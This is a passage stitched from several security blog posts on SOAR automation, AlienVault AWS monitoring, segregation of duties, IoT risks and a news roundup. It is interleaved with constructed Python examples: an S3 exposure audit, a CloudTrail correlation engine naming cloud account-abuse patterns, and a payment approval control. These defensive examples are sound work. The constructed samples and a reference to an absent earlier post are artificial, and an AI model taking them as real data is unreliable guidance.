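ALL_ON = {k: True for k in BPA_KEYS}
SAMPLE_BUCKETS = [
    {"Name": "capture-logs-constructed",      # the post's scenario: a public-read ACL
     "ACL": {"Grants": [{"Grantee": {"Type": "Group",
                                     "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
                         "Permission": "READ"}]}},
    {"Name": "static-site-constructed",       # public via policy, private ACL
     "ACL": {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner"},
                         "Permission": "FULL_CONTROL"}]},
     "Policy": json.dumps({"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject",
          "Resource": "arn:aws:s3:::static-site-constructed/*"}]})},
    {"Name": "private-constructed",
     "ACL": {"Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": "owner"},
                         "Permission": "FULL_CONTROL"}]},
     "BlockPublicAccess": ALL_ON},
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_BUCKETS, ALL_OFF).items():
        print(name, "PUBLIC" if reasons else "private", reasons)
```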
The cognitive tools/technologies of machine learning (ML) and artificial intelligence (AI) are impacting the cybersecurity ecosystem in a variety of ways. Applied AI, machine learning and natural language processing are being used in cybersecurity by both the private and public sectors to bolster situational awareness and enhance protection from cyber threats. The algorithmic enablers that make ML and AI pinnacles of cybersecurity are automation and orchestration. Last year, the research and analyst firm Gartner coined the term SOAR. It stands for Security Orchestration, Automation and Response. A key element of SOAR has been the automation and orchestration elements. An excellent analysis of the impact of automation was provided by Stan Engelbrecht in his column in Security Week called The Evolution of SOAR Platforms. Stan noted “as SOAR platforms evolve, they are requiring less experience from users. Vendors embed security expertise into the products, in the form of pre-built playbooks, guided investigation workflows, and automated alert prioritization. Automation and orchestration features have also reached a level of sophistication where they can be integrated into an existing security framework without relying on users to know exactly what should be automated.” Indeed, SOAR and corollary cybersecurity automation technologies combined with ML and AI tools can be viewed as a strong framework for mitigating evolving threats. AI and ML have emerged into new paradigms for automation in cybersecurity. They enable predictive analytics to draw statistical inferences to mitigate threats with fewer resources. In a cybersecurity context, AI and ML can provide a faster means to identify new attacks, draw statistical inferences and push that information to endpoint security platforms. Three significant factors are heightening cyber risk: 1) Skilled Worker Shortage: It is widely noted that the cybersecurity industry is facing major skilled worker shortages. 
According to data published on Cyberseek, U.S. employers in the private and public sectors posted an estimated 313,735 job openings for cybersecurity workers between September 2017 and August 2018. That’s in addition to the 715,000-plus cybersecurity workers already employed. It is not just a U.S. problem but a global one, and the demand for skilled workers to address the growing prevalence and sophistication of cyber-threats is growing exponentially. 2) Expanding Digital Connectivity: The expanding connectivity of the Internet of Things (IoT) has greatly increased cyber vulnerabilities. IoT refers to the general idea of devices and equipment that are readable, recognizable, locatable, addressable, and/or controllable via the internet. This includes everything from home appliances and wearable technology to cars. Gartner predicts that there may be nearly 26 billion networked devices on the IoT by 2020. The number of devices provides a larger attack surface with more targets for cyber criminals and makes defending networks and endpoints even more difficult. 3) Sophistication of Adversaries: Cybercriminals are using machine learning techniques to discover vulnerabilities on their targets and to automate their own attacks (with increasing success). They often share tools available on the Dark Web, and hacker attacks are now faster, more calculating, and more lethal. The threat actors are many and varied, including nation states, criminal enterprises, and hacktivists. The three factors I highlighted are not the only ones forcing the need for automation and orchestration tools, but they are prevailing ones. To keep up with cyber-threats and help level the playing field against attackers, companies and governments need to evaluate and assimilate many of the automation and orchestration tools that hackers employ and integrate them into their own security orchestration, automation and response (SOAR) platforms and security information and event management (SIEM) platforms. 
They should implement these tools and technologies under a comprehensive risk management strategy. Security automation and orchestration of applications should be commensurate with, and grow alongside, the benefits derived from (and adversarial risks posed by) AI and ML. These technologies can provide for more efficient decision-making by prioritizing and acting on data, especially across larger networks and supply chains with many users and variables. The automation and orchestration tool chest can now utilize horizon scanning technologies, filter through alerts, use predictive analytics, facilitate identity management, coordinate incident response (audits and alerts), use self-repairing software and patch management, and employ forensics and diagnostics after an attack. Automation and orchestration can be valuable in enhancing existing cybersecurity architecture such as preventive security controls, including firewalls, application security and intrusion prevention systems (IPSs). Perhaps most importantly, automation and orchestration can provide a more rapid response capability across a multitude of security components and tools, whether they are located in the cloud or in onsite data centers. The faster a CISO can identify and address a threat or breach, the better the likely outcome. Combating machine-driven hacker threats requires being proactive by constantly updating and testing cybersecurity capabilities. Using ML automation platforms to recognize and predict anomalies associated with the database of behavioral patterns of malicious threats can be an indispensable layer in an integrated cyber-defense. For the public sector, automation, combined with ML and AI, is an emerging and future cybersecurity pathway, especially for industrial systems and critical infrastructure. DARPA is investing for the Department of Defense (DoD) in developing these capabilities for the warfighter. 
DARPA announced a multi-year investment of more than $2 billion in new and existing programs called the “AI Next” campaign. DARPA’s website notes that “key areas of the campaign includes automating critical DoD business processes, such as security clearance vetting or accrediting software systems for operational deployment; improving the robustness and reliability of AI systems; enhancing the security and resiliency of ML and AI technologies; reducing power, data, and performance inefficiencies; and pioneering the next generation of AI algorithms and applications, such as “explainability” and “common sense reasoning.” For domestic federal security, the Department of Homeland Security (DHS) has deployed an automated cyber surveillance system that monitors federal internet traffic for malicious intrusions and provides near real-time identification and detection of malicious activity called EINSTEIN. This system is continually being upgraded. Einstein is only one element of DHS’s use of automation. DHS’s newly created Cybersecurity and Infrastructure Security Agency (CISA) will be using cognitive automation for cyber, collaboration and communication capabilities in many areas of its defined mission: Proactive Cyber Protection CISA's National Cybersecurity and Communications Integration Center (NCCIC) provides 24x7 cyber situational awareness, analysis, incident response and cyber defense capabilities to the Federal government; state, local, tribal and territorial governments; the private sector and international partners. CISA provides cybersecurity tools, incident response services and assessment capabilities to safeguard the ‘.gov’ networks that support the essential operations of partner departments and agencies. 
Infrastructure Resilience CISA coordinates security and resilience efforts using trusted partnerships across the private and public sectors, and delivers training, technical assistance, and assessments to federal stakeholders as well as to infrastructure owners and operators nationwide. CISA provides consolidated all-hazards risk analysis for U.S. critical infrastructure through the National Risk Management Center. Emergency Communications CISA enhances public safety interoperable communications at all levels of government, providing training, coordination, tools and guidance to help partners across the country develop their emergency communications capabilities. Working with stakeholders across the country, CISA conducts extensive, nationwide outreach to support and promote the ability of emergency response providers and relevant government officials to continue to communicate in the event of natural disasters, acts of terrorism, and other man-made disasters. Cybersecurity Ventures predicts that cybercrime will cost the world $6 trillion annually by 2021. That is a scary scenario. It is important that both government and industry are investing together in automation and orchestration to harness productivity and to especially address cyber-threats. It will take a vibrant partnership to help meet the threats. With every passing year, cyber criminals become more sophisticated and adept in their cyber-attacks. In view of a lack of skilled workers, expanding digital connectivity, and the growing sophistication of adversaries, automation and orchestration are key elements for a viable cybersecurity posture. Ultimately, incorporating these elements will become a cybersecurity imperative in an AI and ML guided world.
Viva Las Vegas! We aliens have landed at AWS re:Invent 2018 (Booth #1506), bringing phenomenal threat detection, response, and compliance to the AWS cloud. As I gear up for a full day of live product demos, I thought I’d take a moment to highlight some of the ways in which AlienVault is delivering phenomenal security to our customers’ AWS environments and beyond. We’re monitoring more AWS services than ever, giving you deeper security visibility of your AWS infrastructure. In 2018, we’ve expanded the number of AWS services that USM Anywhere monitors to include Amazon GuardDuty, Amazon Macie, AWS Application Load Balancer, Amazon Redshift, AWS Lambda invocations, AWS Web Application Firewall, and Amazon API Gateway. This is in addition to the other services we monitor and alert on, including AWS CloudTrail, Amazon S3 access logs, Amazon ELB access logs, Amazon VPC flow logs, AWS Config, Amazon CloudFront, and Amazon CloudWatch. Expanding our AWS threat coverage continues to be a priority for us as more and more customers undergo digital transformations and begin to leverage cloud services and applications to run their businesses. USM Anywhere continuously and automatically monitors AWS infrastructure for threats and anomalous behaviors, assesses your AWS environment for vulnerabilities and configuration errors, and simplifies logging and reporting—all from one cloud-hosted platform. What’s more, USM Anywhere centralizes security monitoring across AWS, multi-cloud, hybrid, and on-premises networks, including SaaS applications like Office 365 and G Suite, ensuring continuous coverage even as you migrate workloads and data from the network to the cloud and helping to eliminate security blind spots. This single-pane-of-glass approach alleviates the need to invest in multiple, siloed security monitoring tools for clouds, networks, and data centers, as John Chesser, Director of Cybersecurity Solutions at DataPath, a certified AlienVault MSSP, pointed out. 
“There's time, money, resources that are impacted by having to use the multitude of products out there. With USM Anywhere, I've got it all." We’re keeping your defenses current with continuous AWS-specific threat intelligence. As part of the continuous threat intelligence subscription built into USM Anywhere, the AlienVault Labs Security Research team maintains an AWS-specific correlation rule set. Threat actors are increasingly targeting insecure cloud accounts to access exposed data or set up cryptojacking operations. Once an attacker has gained access to your AWS account, their actions and behaviors may be unique or specific to the environment, such as programmatically spinning up new services. It’s not enough to rely on traditional threat intelligence, which focuses on network threats rather than cloud-specific attacks. That’s why the AlienVault Labs Security Research Team curates AWS-specific threat intelligence, researching and analyzing millions of security events every day using a combination of machine learning, human analysis, and the community-sourced threat data of the AlienVault Open Threat Exchange (OTX) and its 100,000+ global participants. 
Here are a few examples of AWS-specific correlation rules added in 2018:
- The password associated with an administrator of a Windows instance was retrieved through the AWS console, which may indicate compromised credentials
- An EC2 instance in your AWS environment is querying a domain name associated with a known command and control server
- The machine is behaving in a way that deviates from the established baseline; it has no history of sending this much traffic, suggesting it might be compromised
- A request for temporary security credentials has been followed by the removal of multiple API keys, a technique malicious actors use to maintain persistence and prevent the owner of the AWS account from regaining access
- A new AWS user account is deleting multiple user accounts in a short period of time, which could be malicious attackers trying to disrupt incident response efforts
The automatic and continuous threat intelligence updates from the AlienVault Labs Security Research Team enable USM Anywhere customers to keep up with the latest cloud security threats with minimal effort. As John Chesser noted, “Ultimately, with that integration of the threat intelligence, I haven't had to take information from a third party and try to integrate that. I'm not having to jump to some other product to do it. It's all there together.” We’re adding another layer of AWS threat detection with the AlienVault Agent. Earlier this year, AlienVault announced the addition of the AlienVault Agent, a lightweight endpoint agent based on osquery that enables endpoint detection and response (EDR) capabilities in USM Anywhere. When deployed to endpoints within an AWS environment, the AlienVault Agent provides host-based intrusion detection and file integrity monitoring capabilities that are not possible through CloudTrail. 
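Several of the behaviours on this page are sequences of CloudTrail management events by one actor: the EC2 instance bursts and RDS/EBS snapshot abuse from the IAM risks post above, and the temporary-credentials-then-key-deletion and mass-user-deletion rules listed here. The following is an added example, not AlienVault’s or AWS’s code, of a small sliding-window correlation engine that expresses those patterns as data-driven rules; rule names, thresholds, the `ev` helper and the sample records are all constructed for illustration.

```python
"""Added example (not AlienVault's or AWS's code): a small correlation engine over
CloudTrail records that flags the account-abuse sequences described on this page
(EC2 instance bursts, snapshot abuse, temporary credentials followed by API-key
deletion, one actor deleting many IAM users). Rule names, thresholds and the
sample records are constructed for illustration."""
from collections import defaultdict
from datetime import datetime, timedelta

# A rule fires when a single actor produces, inside `window` seconds, at least
# `min_count` events from `follow`. With a `trigger`, the window starts at that
# event; without one, it starts at any `follow` event. `param` additionally
# requires the matching event's requestParameters to contain that key.
RULES = [
    {"name": "EC2 instance burst (possible cryptomining)", "trigger": None,
     "follow": {"RunInstances"}, "min_count": 3, "window": 300},
    {"name": "EBS snapshot followed by volume creation", "trigger": "CreateSnapshot",
     "follow": {"CreateVolume"}, "min_count": 1, "window": 3600},
    {"name": "RDS snapshot restored then master password reset",
     "trigger": "RestoreDBInstanceFromDBSnapshot", "follow": {"ModifyDBInstance"},
     "min_count": 1, "window": 3600, "param": "masterUserPassword"},
    {"name": "Temporary credentials followed by removal of multiple API keys",
     "trigger": "GetSessionToken", "follow": {"DeleteAccessKey"},
     "min_count": 2, "window": 600},
    {"name": "One actor deleting multiple IAM users", "trigger": None,
     "follow": {"DeleteUser"}, "min_count": 3, "window": 600},
]

def parse_time(stamp):
    """CloudTrail eventTime is ISO 8601 in UTC, e.g. 2018-11-20T10:00:00Z."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ")

def actor_of(record):
    """Key events by access key when present, otherwise by the principal ARN."""
    ident = record.get("userIdentity", {})
    return ident.get("accessKeyId") or ident.get("arn", "unknown")

def correlate(records, rules=RULES):
    """Return one alert per (actor, rule) whose sequence appears in `records`."""
    by_actor = defaultdict(list)
    for rec in records:
        by_actor[actor_of(rec)].append(rec)
    alerts = []
    for actor, events in by_actor.items():
        events.sort(key=lambda r: parse_time(r["eventTime"]))
        for rule in rules:
            window = timedelta(seconds=rule["window"])
            if rule["trigger"]:
                starts = [e for e in events if e["eventName"] == rule["trigger"]]
            else:
                starts = [e for e in events if e["eventName"] in rule["follow"]]
            for start in starts:
                t0 = parse_time(start["eventTime"])
                hits = [e for e in events
                        if e["eventName"] in rule["follow"]
                        and t0 <= parse_time(e["eventTime"]) <= t0 + window
                        and ("param" not in rule
                             or rule["param"] in (e.get("requestParameters") or {}))]
                if len(hits) >= rule["min_count"]:
                    alerts.append({"rule": rule["name"], "actor": actor,
                                   "first_seen": start["eventTime"], "count": len(hits)})
                    break  # one alert per actor and rule is enough
    return alerts

def ev(stamp, name, key, params=None):
    """Build a minimal constructed CloudTrail record (real records carry far more)."""
    return {"eventTime": stamp, "eventName": name,
            "userIdentity": {"accessKeyId": key,
                             "arn": f"arn:aws:iam::111122223333:user/{key.lower()}"},
            "requestParameters": params}

# Constructed sample: three abusive actors and one benign administrator.
SAMPLE_RECORDS = [
    ev("2018-11-20T10:00:00Z", "RunInstances", "AKIACONSTRUCTED1"),
    ev("2018-11-20T10:00:20Z", "RunInstances", "AKIACONSTRUCTED1"),
    ev("2018-11-20T10:00:40Z", "RunInstances", "AKIACONSTRUCTED1"),
    ev("2018-11-20T11:00:00Z", "RestoreDBInstanceFromDBSnapshot", "AKIACONSTRUCTED2",
       {"dBInstanceIdentifier": "prod-copy", "dBSnapshotIdentifier": "prod-nightly"}),
    ev("2018-11-20T11:05:00Z", "ModifyDBInstance", "AKIACONSTRUCTED2",
       {"dBInstanceIdentifier": "prod-copy", "masterUserPassword": "****"}),
    ev("2018-11-20T12:00:00Z", "GetSessionToken", "AKIACONSTRUCTED3"),
    ev("2018-11-20T12:01:00Z", "DeleteAccessKey", "AKIACONSTRUCTED3"),
    ev("2018-11-20T12:02:00Z", "DeleteAccessKey", "AKIACONSTRUCTED3"),
    ev("2018-11-20T09:00:00Z", "RunInstances", "AKIAADMINCONSTRUCTED"),
    ev("2018-11-20T13:00:00Z", "DeleteAccessKey", "AKIAADMINCONSTRUCTED"),
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_RECORDS):
        print(alert)
```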
Whereas CloudTrail provides visibility into activity that occurs at the management level, such as when someone creates a file in an S3 bucket or spins up a new service, the Agent can reveal system-level information such as which users are logging in, which files are being created or modified, and which configurations are being changed. This helps USM Anywhere detect activity like persistence by malware and attackers. In combination, CloudTrail monitoring and the AlienVault Agent provide a multi-layered approach to threat detection in USM Anywhere. For example, let’s look at how USM Anywhere helps users detect cryptojacking. Often, an attacker will use compromised AWS credentials to gain access to an AWS environment and begin to consume your resources for cryptomining activities. USM Anywhere detects this activity through CloudTrail event logs. However, another common cryptomining attack method comes with a sneaky twist that’s much more difficult to detect. Instead of spinning up new resources that can be detected through CloudTrail monitoring, an attacker might compromise existing instances within an AWS environment, perhaps through a web vulnerability or SSH. While CloudTrail can’t provide visibility of what’s happening on the system itself, the AlienVault Agent can still detect these exploits with its endpoint visibility. We work hard to provide powerful cloud security for AWS environments, and our customers reap the benefits. For Jason Harper, CEO and Founder of CeloPay, a payment processing technology company whose offering is built entirely in AWS, using USM Anywhere has been a game-changer. “I am thrilled with USM Anywhere,” Harper said. 
“The platform’s centralized log management consolidates and parses CeloPay’s millions of data points to provide full security visibility, which has reduced our PCI DSS compliance reporting time from eight weeks or more to one week.” Overall, it’s been a great year for AWS security with USM Anywhere, and I’m proud to share the work we’ve done to help keep your AWS environments secure. Join us at AWS re:Invent #1506 this week to learn more about how AlienVault secures customers' AWS environments.
Read more:
- Learn more about CeloPay’s experience with USM Anywhere in this case study
- Watch the AWS security webinar featuring CeloPay
- Learn about PCI DSS Compliance on AWS with USM Anywhere
- Read the Whitepaper: Best Practices for AWS Security
- Check out our AWS Security solution brief
Segregation of duties is a fundamental information security practice. In simple terms, it means you split out important tasks between two or more people. This prevents one person getting drunk on all the power they wield, and also prevents one person from making a mistake that can have undesired consequences. One of the best examples of segregation of duties can be seen in movies when it comes to launching nuclear missiles. The system relies on two people on opposite sides of the console to put in and turn their keys at the same time. This segregation or separation of duties ensures that one person can’t launch a nuclear missile on their own. Segregation of duties works best when there is a clearly defined function and where there is some physical separation. For example, in a call centre or a banking app, a junior administrator may be able to authorise payments up to $500, but anything above that would need a supervisor’s approval. The junior admin can enter the details and send it off to the supervisor, who can then approve or decline it. But in many cases, the broader application can have some flaws. In one of my first jobs in IT Security, our team had implemented a process for separating duties whenever a new HSM key (key change ceremony) needed to be loaded. I worked in the team that would hold half the password to complete this task, and another team would hold the other half. Much like the end of the film Bulletproof Monk, I even had my half of the password tattooed on my back – I still don’t know what it says to this day. Once a project was underway, it meant I’d have to travel across the country to the data centre with my half of the password in order to change the key with the help of a colleague. The only problem with that is - have you ever worked on a project? It’s never on time - always delayed. And datacenters are COLD! 
So here I was, sat in a datacenter with this other guy who was about 50 but was clearly experienced in these projects, as he was sitting under a blanket he’d brought, reading his book and munching on some snacks. What’s wrong with this scenario? Other than the fact I didn’t have a blanket or snacks: we’d travelled from different parts of the country, each with half of a password, only to be sat together for hours, invalidating all the expensive measures taken to segregate the two halves of the password. Even worse, I had no idea what I was doing or how to do it. I was told the documentation was up to date and easy to follow - but documentation being up to date is one of the biggest lies our team told. So, I ended up having to ask my colleague to help me out - which inevitably meant I gave him my half of the password and asked him to enter it… yeah, separation of duties kind of fell apart right there. Having said that, those were simpler times: there was no bring your own device, and there certainly wasn’t anything hosted in the cloud. Many times when organisations adopt cloud apps, they overlook segregating duties, or defining job functions for role-based access control (RBAC). So it ends up with an all-or-nothing approach, which works fine only if all employees are trustworthy and never make a mistake. Unfortunately, it’s all too easy to make a mistake. When a single contractor is able to inadvertently leak the personal details of all employees in the database, one has to consider whether one person should have the power to do that, or if the access should be segregated. Similarly, if a rogue trader can make investments and harm a bank, one needs to question why the systems were set up in a manner that allowed them to carry out such trades with little oversight. 
Or allowing developers to accidentally push code to production environments with one click… Recently a French cinema chain was tricked by an email in a business email compromise (BEC) scam, which resulted in the CFO making payments of $21M to the fraudsters. The question shouldn’t be why the CFO allowed themselves to be tricked, but why the systems allowed the CFO to make such large payments without any checks and balances in place. While a host of technologies can help in these situations, a bit of forethought with proper separation and accountability can go a long way. Did these people learn nothing from Bulletproof Monk? Seriously, you should watch that movie – it’s got a lot going on.
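The maker-checker control described in this post (a junior admin enters a payment, anything above a threshold waits for a different person to approve) can be enforced in code rather than left to habit. The following is an added example, not from the original post; the threshold, role names, users and payee names are constructed, and the walk-through includes the case the BEC story raises, where even a senior person cannot approve their own large payment.

```python
"""Added example (not from the original post): a maker-checker payment control that
enforces the separation of duties the post describes, including the case where the
maker and the would-be approver are the same person. Threshold, roles and users are
constructed for illustration."""
from dataclasses import dataclass
from typing import Optional

APPROVAL_THRESHOLD = 500.00  # constructed: anything above this needs a second person

@dataclass
class Payment:
    amount: float
    payee: str
    submitted_by: str
    approved_by: Optional[str] = None
    state: str = "pending"  # pending -> executed | declined

class PaymentDesk:
    """Roles are constructed: 'junior' can enter payments, 'supervisor' can approve."""

    def __init__(self, roles):
        self.roles = dict(roles)  # user name -> role

    def submit(self, user, amount, payee):
        if user not in self.roles:
            raise PermissionError(f"{user} is not an authorised user")
        payment = Payment(amount, payee, submitted_by=user)
        # Within the maker's own limit the payment executes straight away.
        if amount <= APPROVAL_THRESHOLD:
            payment.state = "executed"
        return payment

    def approve(self, approver, payment):
        if payment.state != "pending":
            raise ValueError(f"payment is already {payment.state}")
        # The two checks that make this segregation rather than a rubber stamp:
        # the checker must be a different person, and must hold the checker role.
        if approver == payment.submitted_by:
            raise PermissionError("a maker may not check their own payment")
        if self.roles.get(approver) != "supervisor":
            raise PermissionError(f"{approver} cannot approve payments")
        payment.approved_by = approver
        payment.state = "executed"
        return payment

    def decline(self, approver, payment):
        if self.roles.get(approver) != "supervisor" or payment.state != "pending":
            raise PermissionError("only a supervisor can decline a pending payment")
        payment.state = "declined"
        return payment

def demo():
    """Walk through the post's scenarios; returns the resulting states for inspection."""
    desk = PaymentDesk({"alice": "junior", "bob": "supervisor", "cfo": "supervisor"})
    small = desk.submit("alice", 300.00, "stationery-supplier-constructed")
    large = desk.submit("alice", 5000.00, "contractor-constructed")
    blocked = None
    try:
        desk.approve("alice", large)          # maker trying to check her own work
    except PermissionError as err:
        blocked = str(err)
    desk.approve("bob", large)                # a different, authorised person
    # Even a senior person's own large payment waits for someone else.
    bec = desk.submit("cfo", 21_000_000.00, "fraudster-account-constructed")
    try:
        desk.approve("cfo", bec)
    except PermissionError:
        pass
    return {"small": small.state, "large": large.state,
            "large_approver": large.approved_by, "blocked": blocked, "bec": bec.state}

if __name__ == "__main__":
    print(demo())
```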
The internet of things (IoT) is changing nearly every industry. Smart devices that can collect and process data, and even make decisions based on that data through artificial intelligence, promise to disrupt business as we know it for years to come. However, there are some legitimate concerns. The more connected devices your company has, the more potential vulnerabilities are out there. As business owners, we want to be able to access the data we collect through the IoT, but we also need to be able to protect that data, and we bear the responsibility for keeping that data secure. This, like many areas of business, is a time for brutal honesty. If you have vulnerabilities, you need to fix them. You don’t want to be part of the headlines about companies who acted too late or not at all. Your security must adapt to the IoT, and it needs to do so now. Is the internet of things threatening your company’s security? There are a few questions you will need to ask yourself and your IT department to truly determine the answer: How do I know? Most experts agree that the weakness in any network is the devices that make up the IoT. For example, if you have smart light bulbs in your home, they are likely controlled by a hub, which not only provides you with more flexibility in controlling them but also provides security so they do not become a weak point in your network. This is why an intrusion detection system (IDS) is so important. Technologies from companies like AlienVault allow you to monitor for threats and even give you advice on how to prevent harm from them. Remember there is more than one area of vulnerability in any system. Cloud-based IDS, network IDS, and host-based IDS, along with file integrity monitoring systems, are all essential parts of your strategy. These alerts tell you there is an attack and can even reveal threats to you, which allows you to put remediation and prevention strategies in place. But what are the threats you should be aware of? 
What are the threats? Why don’t we have houses that are completely smart and controlled by IoT devices? What about our cars? Part of the reason is that a hacker with the right tools could potentially take control of a house or even a connected car away from the owner or driver. The stakes are not theoretical: the Bangladesh Bank lost $81 million in 2016 after attackers gained a foothold in its network and issued fraudulent transfers. What are these types of attacks? There are several, and they mirror other types of cyberattacks. Distributed Denial of Service (DDoS): compromised IoT devices are conscripted to flood a target with traffic until it can no longer serve legitimate users. Device hijacking: control of devices or a system is taken over by an attacker, as researchers demonstrated with the remotely compromised Chrysler/Jeep. Sometimes this comes with ransomware, where the owner or user has to pay to get that control back. Malware: IoT devices can be used by an attacker to spread malware, sometimes to more than one device. Botnets: a botnet is a network of infected devices used to perform malicious attacks, like the much-reported refrigerator that was sending spam emails. We hear about these types of attacks in the news on a regular basis, and unfortunately as security evolves and gets better, hackers innovate as well, finding new ways to get past security measures. They are always searching for vulnerabilities, so you and your business must be just as vigilant as they are. What preventative actions can I take? The risks are clearly out there. Just knowing there is an attack and the types of attacks is not enough, however. You also need to know how to prevent them. This is a multipronged answer, but there are some simple, general steps any business can implement to prevent all but the most determined of attacks, or at least slow them down. Buy the Right Devices Whether they are for your home or your business, purchasing the right devices in the first place, ones with good security ratings, is probably the most important step. Do they plug into a controller or have a controller of their own? What level of security does the controller and the device itself have? 
This means doing some research beyond the hype on the product or company website. Look at other online review sites, scroll through forums and groups about security, and simply ask IT security professionals whom you know or who work for you. Change Passwords from Defaults and Use Strong Ones This may seem obvious, but the number of times an IT professional can walk into a business or someone’s home and open a device or network with a default password is amazing. Even more frequently, passwords are simple to guess or just extremely weak. This is perhaps the most frequently vulnerable area of any system, yet it is easily prevented. Use a password manager like LastPass, or iCloud Keychain if you are a Mac user, to generate a strong, unique password for each device and account and remember it for you. There’s no reason not to have strong passwords, and change them whenever you suspect one has been exposed. Hire the Right People This may be the most important point of all. Encryption, comprehensive security solutions and all of the above actions depend on people, both those who know how to implement them and the employees who use them. Hire the right IT people. A degree matters in many fields, and IT is one of them. Hire someone with a degree in information systems and security, and if they have been in the workforce for a while, look at their continuing education and how up-to-date they are on the latest techniques and technology. Educate your employees: there should be regular classes company-wide on what the latest IoT devices are, how they are vulnerable, and how employees play a role in protecting themselves and the company. Address issues right away. If you have a personnel issue or find that someone is out of compliance with your policies, take corrective action immediately. Your security is only as strong as its weakest link, and often that is the person in front of the computer. Anyone who has access to your network is a key player in IoT security. 
They can bypass many of your safety measures unintentionally. HR plays a big role in this process from the hiring to the training of employees, vendors, and contractors. The IoT is a wonderful tool in the right hands and a dangerous weapon in the hands of others. Make sure that your company security is not threatened by being vigilant, knowing the threats that are out there, taking preventative action, and hiring the right people to help.
Collecting stories over the course of the week is always fun. You start reading one story, and before you know it you’re down the rabbit hole of technology, security, and privacy, reading papers on how scientists want to embed IoT devices in giraffes’ necks. Fear not, I am here to strip away the mundane and irrelevant and bring you only the best in news, designed to make your heart flutter. Why Google consuming DeepMind Health is scaring privacy experts Google’s decision to bring DeepMind Health, the medical unit of the AI-powered company it acquired four years ago, closer to the mothership may leave 1.6 million NHS patients with “zero control” over where their personal data goes, experts say – while an independent body set up to oversee the protection of such data has been broken up. There’s no denying that there are huge benefits to be gained from better aggregation and analysis, but by whom, with what oversight, and where does it end? Why Google consuming DeepMind Health is scaring privacy experts | Wired In related Google news, the company has published its first quarterly transparency report with stats on the security of the Android ecosystem. Android ecosystem security | Google On a side note, maybe we give big data analytics too much credit sometimes. User Behavior Analytics Could Find a Home in the OT World of the IIoT UBA has been around in data-centric IT for at least four years, but it has never become industry-standard primarily because in the real world, user behavior in IT is so varied and complex that UBA often creates more false alarms than useful ones. In IT, UBA has often failed to find the dangerous needle in the immense haystack of user behavior. But user behavior in process-centric OT is much simpler: OT systems run the plant, and scripted user activity is nowhere near as varied as in IT, with its multiple endpoints and inputs, email browsing, multipart software stacks, etc. 
User Behavior Analytics Could Find a Home in the OT World of the IIoT | Dark Reading IT-to-OT Solutions That Can Bolster Security in the IIoT | Dark Reading Busting SIM Swappers and SIM Swap Myths SIM swapping attacks primarily target individuals who are visibly active in the cryptocurrency space. This includes people who run or work at cryptocurrency-focused companies; those who participate as speakers at public conferences centered around Blockchain and cryptocurrency technologies; and those who like to talk openly on social media about their crypto investments. REACT Lieutenant John Rose said in addition to or in lieu of stealing cryptocurrency, some SIM swappers will relieve victims of highly prized social media account names (also known as “OG accounts“) — usually short usernames that can convey an aura of prestige or the illusion of an early adopter on a given social network. OG accounts typically can be resold for thousands of dollars. Busting SIM Swappers and SIM Swap Myths | Krebs on Security The deep, dark reach of the magecart group For at least four years, a distributed, sophisticated network of cybercrime groups known collectively as Magecart has been compromising ecommerce sites small and large, as well as payment processors, installing web skimmers to steal confidential information, and raking in a fortune by selling pilfered card numbers on the underground, largely without any repercussions. Although security researchers have been tracking some of the groups since 2015, only recently has the Magecart name begun to ring out, as some elements of the group have hit major targets, including Ticketmaster and Newegg, drawing the attention of several law enforcement agencies and heightened interest in the research community. 
The deep, dark reach of the magecart group | Decipher Fake news 'to get worse' by 2020 election Krikorian, a computer scientist who previously held senior positions at Uber and Twitter, acknowledged social media companies like Facebook are taking steps to increase transparency. But he said their business models, driven by revenue and engagement, do not incentivize solutions for fighting fake news, and the problem wouldn't fix itself by the next U.S. presidential election. Fake news 'to get worse' by 2020 election unless social media firms act, DNC tech chief says | CNBC DOD prepares endpoint cybersecurity strategy as mobility booms In the end, will it come back to the endpoint? As the use of mobile devices and services pervades the lives of civilians and military personnel alike, the Department of Defense is taking a more endpoint-driven approach to how it secures its networks, developing a forthcoming enterprise cybersecurity strategy focused specifically around the gadgets people use. DOD CIO Dana Deasy said, “One of the things I keep stressing is we have to step up and face the reality about the world around us becoming more and more mobile, each and every day.” And it’s getting to a point where DOD must begin to embrace mobility, even if it means added security challenges. DOD prepares endpoint cybersecurity strategy as mobility booms | Fedscoop The rise of multivector DDoS attacks A really good post on DDoS trends and the rise of multivector DDoS attacks, which shouldn’t come as a complete surprise to most; but seeing this analysis helps quantify it all. The rise of multivector DDoS attacks | Cloudflare Six month prison sentence for motor industry employee in first ICO Computer Misuse Act prosecution So, the ICO does have some teeth after all. A motor industry employee has been sentenced to six months in prison in the first prosecution to be brought by the Information Commissioner’s Office (ICO) under legislation which carries a potential prison sentence. 
Mustafa Kasim, who worked for accident repair firm Nationwide Accident Repair Services (NARS), accessed thousands of customer records containing personal data without permission, using his colleagues’ log-in details to access a software system that estimates the cost of vehicle repairs, known as Audatex. He continued to do this after he started a new job at a different car repair organisation which used the same software system. The records contained customers’ names, phone numbers, vehicle and accident information. Six month prison sentence for motor industry employee in first ICO Computer Misuse Act prosecution | ICO Clickjacking on Google MyAccount Worth 7,500$ A nice writeup by a researcher who found a clickjacking bug on Google. My favourite part was the timeline at the end: Aug 11 : Report to Google Aug 15 : Google Staff Ask Detail Aug 15 : Adding Detail Aug 21 : Google Can’t Prove Bug Aug 21 : Give them Video to PoC Aug 28 : Google Ask About Attack Scenario Aug 28 : Give the Attack Scenario Sep 11 : Nice Catch! Sep 25 : Bounty 7,500$ Sep 25 : I Cry. Clickjacking on Google MyAccount Worth 7,500$ | Apapedulimu Other things I liked this week Why I Dislike Applying “Game-ification” To Goal-Oriented | Paul Jorgensen The future of data storage isn’t on the cloud - it’s on the ‘edge’ | Independent Mysterious Re-Routing of Google Traffic Could Have Been an Attack, or Just a Glitch | Gizmodo System error: Japan cybersecurity minister admits he has never used a computer | Guardian
